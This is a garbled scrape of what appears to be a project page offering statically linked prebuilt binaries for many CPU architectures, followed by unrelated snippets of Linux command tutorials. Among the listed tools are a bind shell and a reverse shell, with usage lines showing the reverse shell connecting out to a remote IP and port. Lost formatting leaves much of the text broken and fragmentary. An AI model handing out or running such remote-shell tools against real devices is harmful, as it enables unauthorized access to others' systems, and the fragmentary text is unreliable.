Prebuilt binaries for multiple architeture (arm, armeb, aarch64, aarch64_be, mips, mips1, mipsel, mipsel1, mips64, mips64el, powerpc, powerpc64, powerpc64le, riscv64, i586, x86_64)
All binaries are statically linked and stripped.
Please go to the Release page for downloads. *archName*_tools.zip
contains tools’ binary (see Tools Section) for that specific arch, and allinone.zip
contains all of it.
Or download single file directly from bin
branch.
The source code and scripts can be
found in the branch.
buildroot 2014.11
because they remove support after that version.buildroot 2019.11.1
output/host
, others are from make sdk
)gdb 7.12.1
, others are 8.3.1
):(
)./bind_shell
will listen on port 3343 and ./bind_shell 6666
will listen on 6666../reverse_shell 1.1.1.1 12345
will connect to 1.1.1.1:12345; ./reverse_shell 1.1.1.1
will connect to 1.1.1.1:3343The config file for buildroot and github actions’ workflow file are in the src
branch.
The cp command, short for "copy," is the main Linux utility for duplicating files and directories. Whether…
Introduction In digital investigations, images often hold more information than meets the eye. With the…
The cat command short for concatenate, It is a fast and versatile tool for viewing and merging…
What is a Port? A port in networking acts like a gateway that directs data…
The ls command is fundamental for anyone working with Linux. It’s used to display the files and…
The pwd (Print Working Directory) command is essential for navigating the Linux filesystem. It instantly shows your…